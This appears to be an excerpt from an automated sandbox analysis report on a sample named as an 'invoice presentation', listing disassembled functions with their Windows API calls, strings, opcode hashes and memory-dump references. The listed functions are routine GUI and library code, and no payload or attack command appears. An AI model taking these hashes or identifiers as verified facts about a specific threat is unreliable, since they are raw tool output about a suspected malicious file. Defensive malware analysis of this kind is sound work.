Opcode ID: 72727562815cf6346e6e75696370645437de25a5ab29d318e64691bec72fc208
Instruction ID: 8062833bf0ab19555699b1c769ed7ad266fd54d1f7a66dfa85a1654af001a7c0
Opcode Fuzzy Hash: 72727562815cf6346e6e75696370645437de25a5ab29d318e64691bec72fc208
Instruction Fuzzy Hash: 3451467190021AEBCF05EFA0CC52EFEBBB5EF45311B104A68FA21B3292DA305905CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00BD243E, Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 393windowCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00BD2448
SendMessageA.USER32(?,0000000B,00000000,00000000), ref: 00BD262C
SendMessageA.USER32(?,0000000B,00000001,00000000), ref: 00BD27F0
InvalidateRect.USER32(?,00000000,00000001), ref: 00BD2816
UpdateWindow.USER32(?), ref: 00BD2838
SendMessageA.USER32(?,0000000B,00000001,00000000), ref: 00BD28F5
InvalidateRect.USER32(?,00000000,00000001), ref: 00BD291B
UpdateWindow.USER32(?), ref: 00BD293D

Strings

:/\, xrefs: 00BD2671

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: MessageSend$InvalidateRectUpdateWindow$H_prolog3_
String ID: :/\
API String ID: 2009545923-2793184486
Opcode ID: 910dccd6100db08a8856827e2b1086f2e3e9aca6c16bdca176e2fba8671b9a3d
Instruction ID: b0970115ed0862065d1c3517520e850fe428ddee6737577f64e632e25c1e1bb9
Opcode Fuzzy Hash: 910dccd6100db08a8856827e2b1086f2e3e9aca6c16bdca176e2fba8671b9a3d
Instruction Fuzzy Hash: BFF11735600254DFDF14EB64CD99BEDBBA5AF89300F0401E9E40AAB3A2DB74AE45CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00BA4BB1, Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 262filecomCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00BA4BB8
OleDuplicateData.OLE32(?,?,00000000), ref: 00BA4C49
GlobalLock.KERNEL32 ref: 00BA4C6B
CopyMetaFileA.GDI32(?,00000000), ref: 00BA4C79
GlobalUnlock.KERNEL32(00000000), ref: 00BA4C87
GlobalFree.KERNEL32 ref: 00BA4C8E
GlobalUnlock.KERNEL32(00000000), ref: 00BA4C9B

Part of subcall function 00BA3A52: __EH_prolog3.LIBCMT ref: 00BA3A59

CopyFileA.KERNEL32(?,?,00000000), ref: 00BA4E49
ReleaseStgMedium.OLE32(?), ref: 00BA4EB1

Strings

, xrefs: 00BA4EAA

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: Global$CopyFileUnlock$DataDuplicateFreeH_prolog3H_prolog3_LockMediumMetaRelease
String ID:
API String ID: 3513689846-3916222277
Opcode ID: 6ac6d012cfdd4e6e20e3a885f1d8461aba8b665a74272381691f4715a6ec8a10
Instruction ID: 02e6e1e93773134d70d76bfd2f0efaf2f6731fa28374281123ba0ef154cfa067
Opcode Fuzzy Hash: 6ac6d012cfdd4e6e20e3a885f1d8461aba8b665a74272381691f4715a6ec8a10
Instruction Fuzzy Hash: 2D916371504601EFDB149F68CD8896ABBF9FF8A7117048299F81ACB655EB70EC01CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00C02D1D, Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 161windowCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00C02D27

Part of subcall function 00BB274F: __EH_prolog3.LIBCMT ref: 00BB2756
Part of subcall function 00BB274F: GetWindowDC.USER32(00000000,00000004,00C01693,00000000), ref: 00BB2782

CreateCompatibleDC.GDI32(00000000), ref: 00C02DAD
SelectObject.GDI32(?,?), ref: 00C02DD0
CreateCompatibleDC.GDI32(00000000), ref: 00C02DF4
GetObjectA.GDI32(?,00000054,?), ref: 00C02E41
CreateDIBSection.GDI32(?,?), ref: 00C02E97
CreateCompatibleBitmap.GDI32(?,?,?), ref: 00C02EAB
BitBlt.GDI32(?,00000000,00000000,?,?,?,?,00000000,Function_00130020), ref: 00C02EF5
SelectObject.GDI32(?,?), ref: 00C02F21

Part of subcall function 00BB280E: DeleteDC.GDI32(00000000), ref: 00BB2842

Part of subcall function 00BB28BE: ReleaseDC.USER32 ref: 00BB28F2

Strings

(, xrefs: 00C02E80

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: Create$CompatibleObject$Select$BitmapDeleteH_prolog3H_prolog3_ReleaseSectionWindow
String ID: (
API String ID: 2605616587-3887548279
Opcode ID: 0362ef6872bedbf70940163e5646d51c602628f063c3414ffc3bc7f9bf225c74
Instruction ID: 46003ec321beca1b7e410a2acdfc21ef2897d7f0d62fb391099ec9318ce82712
Opcode Fuzzy Hash: 0362ef6872bedbf70940163e5646d51c602628f063c3414ffc3bc7f9bf225c74
Instruction Fuzzy Hash: 8F610775900314EFDB24EF65DC85BEABBB5BF08300F1041A9E95AA7251DB70AA84CF61

Uniqueness

Uniqueness Score: -1.00%

Function 00C02FA9, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 121windowCOMMON

Download Yara Rule

APIs

CopyImage.USER32 ref: 00C02FBC

Part of subcall function 00C071F7: __EH_prolog3_GS.LIBCMT ref: 00C07201
Part of subcall function 00C071F7: GetObjectA.GDI32(?,00000018,?), ref: 00C07223
Part of subcall function 00C071F7: GetObjectA.GDI32(?,00000054,?), ref: 00C07268

GetObjectA.GDI32(00000000,00000018,?), ref: 00C02FF6
DeleteObject.GDI32(?), ref: 00C03073
CreateCompatibleDC.GDI32(00000000), ref: 00C030A1
GetObjectA.GDI32(00000000,00000018,?), ref: 00C030BD
GetObjectA.GDI32(?,00000018,?), ref: 00C03107
SelectObject.GDI32(?,?), ref: 00C0312A
CreateCompatibleBitmap.GDI32(?,?,?), ref: 00C03187
SelectObject.GDI32(?,00000000), ref: 00C031A2

Strings

?3, xrefs: 00C02FDF

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: Object$CompatibleCreateSelect$BitmapCopyDeleteH_prolog3_Image
String ID: ?3
API String ID: 4137958905-54517686
Opcode ID: caad3f965378d04c1509b13fdf7f2c125cedd836f031d4ea6d531f5f3d190bc3
Instruction ID: e7f0567b0067dd32456170994e55430efae3e61c03dd8a96bce011009adede2e
Opcode Fuzzy Hash: caad3f965378d04c1509b13fdf7f2c125cedd836f031d4ea6d531f5f3d190bc3
Instruction Fuzzy Hash: 9451E670901629EBDB25DF65CC85BEDBBB8BF08341F4042D5E959A2290DB709F94CF60

Uniqueness

Uniqueness Score: -1.00%

Function 00BF8BEA, Relevance: 16.6, APIs: 11, Instructions: 144windowCOMMON

Download Yara Rule

APIs

GetCapture.USER32 ref: 00BF8C26
ReleaseCapture.USER32 ref: 00BF8C30
GetClientRect.USER32 ref: 00BF8C4A
GetSystemMetrics.USER32 ref: 00BF8C6B
GetSystemMetrics.USER32 ref: 00BF8C93
SendMessageA.USER32(?,00001204,00000000,00000001), ref: 00BF8CD3
SendMessageA.USER32(?,00001204,00000001,00000001), ref: 00BF8D07
GetCapture.USER32 ref: 00BF8D2F
ReleaseCapture.USER32 ref: 00BF8D39
GetClientRect.USER32 ref: 00BF8D53
RedrawWindow.USER32(?,00000000,00000000,00000105), ref: 00BF8DA9

Part of subcall function 00BFB88F: __EH_prolog3_GS.LIBCMT ref: 00BFB896
Part of subcall function 00BFB88F: IsRectEmpty.USER32(?), ref: 00BFB8B1
Part of subcall function 00BFB88F: InvertRect.USER32(?,?), ref: 00BFB8C7
Part of subcall function 00BFB88F: SetRectEmpty.USER32 ref: 00BFB8D4

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: Rect$Capture$ClientEmptyMessageMetricsReleaseSendSystem$H_prolog3_InvertRedrawWindow
String ID:
API String ID: 174338775-0
Opcode ID: 637deb488f864a969b8b9087b0a0b1dff78462d5f61aaeadfaf27e5c8a4c1360
Instruction ID: f4c2f1315db17ec47b79750405562da9dd6c59abb2168ebbe929ee8b6f116192
Opcode Fuzzy Hash: 637deb488f864a969b8b9087b0a0b1dff78462d5f61aaeadfaf27e5c8a4c1360
Instruction Fuzzy Hash: 58514872A00619DFDB05DF68C889AEEBBF5FF48311F1442A9E519E7290DB706E44CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00BEE240, Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 268windowCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00BEE24A
SendMessageA.USER32(?,000000B9,00000001,00000000), ref: 00BEE31F
SendMessageA.USER32(?,000000B9,00000001,00000000), ref: 00BEE566
GetParent.USER32(?), ref: 00BEE583
GetParent.USER32(?), ref: 00BEE596
RedrawWindow.USER32(?,00000000,00000000,00000481,00000000), ref: 00BEE5AE

Part of subcall function 00BBF0F4: IsWindow.USER32(?), ref: 00BBF103
Part of subcall function 00BBF0F4: SetWindowTextA.USER32(?,?), ref: 00BBF11F

ReleaseCapture.USER32(?,000003F8), ref: 00BEE5F6
RedrawWindow.USER32(?,00000000,00000000,00000401,?,000003F8), ref: 00BEE61A

Part of subcall function 00BB95C9: GetWindowTextLengthA.USER32(?), ref: 00BB95DB
Part of subcall function 00BB95C9: GetWindowTextA.USER32 ref: 00BB95F4

Part of subcall function 00C34777: SHBrowseForFolderA.SHELL32(?,?,?,00000000), ref: 00C34825
Part of subcall function 00C34777: SHGetPathFromIDListA.SHELL32(00000000,?,?,?,00000000), ref: 00C34839
Part of subcall function 00C34777: _strlen.LIBCMT ref: 00C3484A

Strings

*?<>|, xrefs: 00BEE3DB

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: Window$Text$MessageParentRedrawSend$BrowseCaptureFolderFromH_prolog3_LengthListPathRelease_strlen
String ID: *?<>|
API String ID: 232291159-3491500753
Opcode ID: b3a752db323bffeed8a800d6ef85834efb40a6be290e2789922bc01ff8a8d5a1
Instruction ID: 0b0435c5d50561eac6e8e39d08a8648d60aa39b9ffbdb876352feffefc1fcdc5
Opcode Fuzzy Hash: b3a752db323bffeed8a800d6ef85834efb40a6be290e2789922bc01ff8a8d5a1
Instruction Fuzzy Hash: D9B13730A4025ADBDF29EB24CD95BFDB7F9EF54304F0041E8A519A7291DB70AE44CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00BAEF5A, Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 268COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00BAF004
CoCreateGuid.OLE32(?,00000034), ref: 00BAF055
_strlen.LIBCMT ref: 00BAF0C8
_strlen.LIBCMT ref: 00BAF0DE
_strlen.LIBCMT ref: 00BAF0F4
_strlen.LIBCMT ref: 00BAF12C
SysFreeString.OLEAUT32(?), ref: 00BAF22E

Strings

%08lX-%04X-%04x-%02X%02X-%02X%02X%02X%02X%02X%02X, xrefs: 00BAF09F
RestartByRestartManager, xrefs: 00BAF0D8, 00BAF0DD, 00BAF0E5

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: _strlen$CreateFreeGuidH_prolog3_String
String ID: %08lX-%04X-%04x-%02X%02X-%02X%02X%02X%02X%02X%02X$RestartByRestartManager
API String ID: 1721273623-5890034
Opcode ID: 30c4c81bc17749037349e94386e86bee3f62732f2cef2f08b8a043aa334bb162
Instruction ID: 8b489026cd73aff7257dc51ebcc742ac0b2a91006bce35a8ce4f2b73c8aa83c2
Opcode Fuzzy Hash: 30c4c81bc17749037349e94386e86bee3f62732f2cef2f08b8a043aa334bb162
Instruction Fuzzy Hash: BC918031A04119EFDF15EBA4CC95AFEBBB9EF49310F1440A9F401A7291DB74AD05DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00BCA99D, Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 194COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00BCA9A4

Part of subcall function 00BC2B11: __EH_prolog3_catch.LIBCMT ref: 00BC2B18

_strlen.LIBCMT ref: 00BCAA2F
_strlen.LIBCMT ref: 00BCAA6B
__EH_prolog3_GS.LIBCMT ref: 00BCAAD9
_strlen.LIBCMT ref: 00BCAB81

Part of subcall function 00BCDBF9: CoInitialize.OLE32(00000000), ref: 00BCDC19

Strings

T, xrefs: 00BCAB2C
T, xrefs: 00BCA9C6
T, xrefs: 00BCA9F7
T, xrefs: 00BCAAFB

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: _strlen$H_prolog3_$H_prolog3_catchInitialize
String ID: T$T$T$T
API String ID: 67003531-3135371328
Opcode ID: b40264337d195d3b981e27b734fb0fd3d11acae174d1dc7075d411fc292b75c2
Instruction ID: 061e5baa27bcc5dc518e8ef11d3abf6dcb5fc692d74262452ba0e5fb5dbc0b34
Opcode Fuzzy Hash: b40264337d195d3b981e27b734fb0fd3d11acae174d1dc7075d411fc292b75c2
Instruction Fuzzy Hash: 26614C75A0021AEFCF11DFA8C886E9EBBF5EF08314B0040AAF915A7251DB74DD14CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00C3424C, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 136memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00BC2B11: __EH_prolog3_catch.LIBCMT ref: 00BC2B18

GetModuleHandleW.KERNEL32(comctl32.dll,00C34392,?,00000000,?,?,00BDE518,?,?,00BDCB84,0000001C,00BDE223,?,00BDCB84), ref: 00C3427C
GetUserDefaultUILanguage.KERNEL32(?,00BDE518,?,?,00BDCB84,0000001C,00BDE223,?,00BDCB84), ref: 00C3428C
FindResourceExW.KERNEL32(00000000,00000005,?,0000FC11,?,00BDE518,?,?,00BDCB84,0000001C,00BDE223,?,00BDCB84), ref: 00C342C9
FindResourceW.KERNEL32(00000000,?,00000005,?,00BDE518,?,?,00BDCB84,0000001C,00BDE223,?,00BDCB84), ref: 00C342E4
LoadResource.KERNEL32(00000000,00000000,?,00BDE518,?,?,00BDCB84,0000001C,00BDE223,?,00BDCB84), ref: 00C342F0

Part of subcall function 00C343E3: _strlen.LIBCMT ref: 00C3440E
Part of subcall function 00C343E3: GetDC.USER32(00000000), ref: 00C34436
Part of subcall function 00C343E3: EnumFontFamiliesExA.GDI32(00000000,?,00C343BA,?,00000000), ref: 00C34451
Part of subcall function 00C343E3: ReleaseDC.USER32 ref: 00C34459

GlobalAlloc.KERNEL32(00000040,00000000,?,00BDE518,?,?,00BDCB84,0000001C,00BDE223,?,00BDCB84), ref: 00C34326
_strlen.LIBCMT ref: 00C3435C

Strings

MS UI Gothic, xrefs: 00C342A3
comctl32.dll, xrefs: 00C34277

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: Resource$Find_strlen$AllocDefaultEnumFamiliesFontGlobalH_prolog3_catchHandleLanguageLoadModuleReleaseUser
String ID: MS UI Gothic$comctl32.dll
API String ID: 2504330361-3248924666
Opcode ID: dc1692fd43753c393a5169e8bc6670d6a918fb5ab5ee884998f67da3fa653b73
Instruction ID: 6bedde0f87d6ce629c44203bb2993b551aa94ab3127fc06557ab00c2238b2d5b
Opcode Fuzzy Hash: dc1692fd43753c393a5169e8bc6670d6a918fb5ab5ee884998f67da3fa653b73
Instruction Fuzzy Hash: 4C41C175610706ABE7186B65DC86F7B33E8EF44B10F058429F92ACB391EA74EE408671

Uniqueness

Uniqueness Score: -1.00%

Function 00BBC55F, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 99COMMON

Download Yara Rule

APIs

__EH_prolog3_catch_GS.LIBCMT ref: 00BBC566
GetPropA.USER32 ref: 00BBC57D
CallWindowProcA.USER32 ref: 00BBC5E2

Part of subcall function 00BBCB1C: GetWindowRect.USER32 ref: 00BBCB5D
Part of subcall function 00BBCB1C: GetWindow.USER32(?,00000004), ref: 00BBCB7A

SetWindowLongA.USER32 ref: 00BBC605
RemovePropA.USER32 ref: 00BBC611
GlobalFindAtomA.KERNEL32(AfxOldWndProc423), ref: 00BBC61C
GlobalDeleteAtom.KERNEL32 ref: 00BBC626

Part of subcall function 00BBCBC7: GetWindowRect.USER32 ref: 00BBCBD4

CallWindowProcA.USER32 ref: 00BBC675

Strings

AfxOldWndProc423, xrefs: 00BBC571, 00BBC60B, 00BBC617

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: Window$AtomCallGlobalProcPropRect$DeleteFindH_prolog3_catch_LongRemove
String ID: AfxOldWndProc423
API String ID: 3351853316-1060338832
Opcode ID: 1816b7fa8000cb7e28f6a7b2d03d6ce866b5e58aefeefba46dc71a04334fd3f1
Instruction ID: 7e4c6e6177ea2aa258de9c212e6a84ba4676a6d9c4d73d0228340562413655ff
Opcode Fuzzy Hash: 1816b7fa8000cb7e28f6a7b2d03d6ce866b5e58aefeefba46dc71a04334fd3f1
Instruction Fuzzy Hash: 28312BB1800618EBCB15EFA4DD59CFEBFF8EF49710B04155AF902A7251CAB59D009BB0

Uniqueness

Uniqueness Score: -1.00%

Function 00C2AB8E, Relevance: 15.4, APIs: 10, Instructions: 350windowCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C2AB95
GetIconInfo.USER32(00000000,?), ref: 00C2ABAD
GetObjectA.GDI32(?,00000018,?), ref: 00C2ABBC
CreateCompatibleDC.GDI32(?), ref: 00C2AC21
CreateCompatibleBitmap.GDI32(?,?,?), ref: 00C2AC44
DrawIconEx.USER32 ref: 00C2AC8C
DeleteObject.GDI32(?), ref: 00C2ACA8
DeleteObject.GDI32(?), ref: 00C2ACB1
GetObjectA.GDI32(00000000,00000018,?), ref: 00C2ACCC
LoadImageA.USER32 ref: 00C2AD61
DeleteObject.GDI32(00000000), ref: 00C2AD79

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: Object$Delete$CompatibleCreateIcon$BitmapDrawH_prolog3ImageInfoLoad
String ID:
API String ID: 4267182157-0
Opcode ID: 693acf548c2dc501f885262abeef936564b2e54117f74ab2282a238a21e50aa1
Instruction ID: fbae66c30cc181045ef6f84b4527974175bf6c1a9fd0bd7992a4ba5cf4bb6a86
Opcode Fuzzy Hash: 693acf548c2dc501f885262abeef936564b2e54117f74ab2282a238a21e50aa1
Instruction Fuzzy Hash: 41D14D71A00619DFCF04DFA8D985AEEBBB5FF48310F14422AE915A7391DB74AD01CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00BDA016, Relevance: 15.3, APIs: 10, Instructions: 268windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00BDA03E

Part of subcall function 00BDD5E2: SendMessageA.USER32(?,00000476,00000000,00000000), ref: 00BDD5F6

SendMessageA.USER32(?,0000110B,00000009,?), ref: 00BDA0FB
InvalidateRect.USER32(?,?,00000001,?), ref: 00BDA15D
InvalidateRect.USER32(?,?,00000001,00000000), ref: 00BDA21C
InvalidateRect.USER32(?,?,00000001,?), ref: 00BDA296
SendMessageA.USER32(?,00001102,00000001,?), ref: 00BDA2BA
SendMessageA.USER32(?,0000110A,00000003,?), ref: 00BDA2CE
SendMessageA.USER32(?,00001102,00000002,?), ref: 00BDA2EF
SendMessageA.USER32(?,0000110A,00000003,?), ref: 00BDA303
__EH_prolog3.LIBCMT ref: 00BDA334

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: MessageSend$InvalidateRect$H_prolog3
String ID:
API String ID: 1399503668-0
Opcode ID: b111d97dc803c72419e3dfcb53583077aba52d179ff121a15e0cbf7b0d4ef8cd
Instruction ID: 2f64db1235bbe7f961965eefb1d6ad4f03d2c1c52715c7bc928ca58c1af4423d
Opcode Fuzzy Hash: b111d97dc803c72419e3dfcb53583077aba52d179ff121a15e0cbf7b0d4ef8cd
Instruction Fuzzy Hash: C9A16071A00706AFDB19EFA5DC85AAEF7E5FF04710F0001AAE915E7291EB719D00CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00BC0C96, Relevance: 15.2, APIs: 10, Instructions: 209COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
